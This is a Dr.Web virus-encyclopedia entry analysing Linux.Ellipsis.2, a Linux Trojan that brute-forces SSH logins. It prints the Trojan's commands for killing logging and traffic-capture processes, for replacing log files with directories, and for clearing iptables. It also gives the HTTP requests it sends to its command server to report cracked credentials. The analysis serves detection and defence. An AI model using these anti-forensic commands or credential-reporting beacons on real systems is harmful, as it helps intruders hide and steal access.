FOR CUSTOMERS

Library
My library

+ Add to library

Contact us
24/7 Tech support | Rules regarding submitting

Send a message

Your tickets

Profile

Linux.Ellipsis.2

Added to the Dr.Web virus database: 2015-09-10

Virus description added:

SHA1:

  • c93957405ed43d8cca936dcf9a894a82fa10a518 (unpacked)
  • 8b34e16d1542766d7c09472dfa23a69a0e1c13ce (UPX)

A Trojan for Linux designed for brute-forcing accounts in order to get access to an attacked system using the SSH protocol. Once launched, it takes one incoming argument:

auto:zzz.ccc.vvv.bbb

где zzz.ccc.vvv.bbb (command and control server IP)

Once launched, the Trojan removes its own working directory ("/tmp/.../") and clears the list of iptables rules. Then it “kills” processes of a number of running applications—for example, of programs used to log events and analyze traffic:

killall syslogd rsyslogd syslog syslog-ng named dnscache dnsmasq tcpdump
killall -9 syslogd rsyslogd syslog syslog-ng named dnscache dnsmasq tcpdump
kill -9 `pidof syslogd rsyslogd syslog syslog-ng named dnscache dnsmasq tcpdump`

Using the "/var/log/*" and "/disk/*log*" masks, the Trojan replaces existing directories and system log files with folders under the same names—this makes creation of logs with identical names in future impossible:

mkdir /var/log/all.log /var/log/auth.log /var/log/messages /var/log/secure /var/log/everything.log /var/log/messages.log /disk/all.log /disk/auth.log /disk/messages /disk/secure /disk/everything.log /disk/messages.log

Then the Trojan extracts from /proc/cpuinfo the processor frequency value specified in the "bogomips" parameter. Based on this value, the malicious program calculates the total number of scanning threads and SSH connections.

After that, the Trojan refers for tasks to the server whose address it gets as an incoming argument on startup. A task obtained from the server contains an IP address of a subnet that the malicious program scans for devices with open SSH connections on port 22. If such devices are detected, the Trojan tries to connect to them by going through all login:password pairs from a special list. If such an attempt is successful, the Trojan sends an appropriate message to the server controlled by cybercriminals.

GET /auto.cgi?root=yes&ip=%s&l=%s&p=%s HTTP/1.0\nUser-Agent:
Mozilla\nAccept-Language: en\nHost: auto\nCopyright: 2005 by RS from
Romania Hello World Microsoft Sucks Bill Gates Must die\n\n

where ip indicates the IP address of the node to which the connection is established, l indicates the login, and p indicates the password.

Using a separate thread, the malware sends the following request to the command and control server with a one-minute interval:

GET
/auto.cgi?report=yes&finish=%d&net=%s&seconds=%d&open=%d&rootcount=%d&s
shspeed=%d&totalssh=%d&ssherrors=%d&totalscan=%d&scanmax=%d&sshmax=%d
HTTP/1.0\nUser-Agent: Mozilla\nAccept-Language: en\nHost:
auto\nCopyright: 2005 by RS from Romania Hello World Microsoft Sucks
Bill Gates Must die\n\n

At that, the “finish” value equals zero. Once scanning is over, the Trojan sends 10 similar requests containing the “finish” value of 1 with a 1-second interval.

The net parameter contains the IP address of the subnet currently scanned by the Trojan.

Curing recommendations


Linux

After booting up, run a full scan of all disk partitions with Dr.Web Anti-virus for Linux.

Free trial

One month (no registration) or three months (registration and renewal discount)

Download Dr.Web

Download by serial number

© Doctor Web
2003 — 2022

Doctor Web is a cybersecurity company focused on threat detection, prevention and response technologies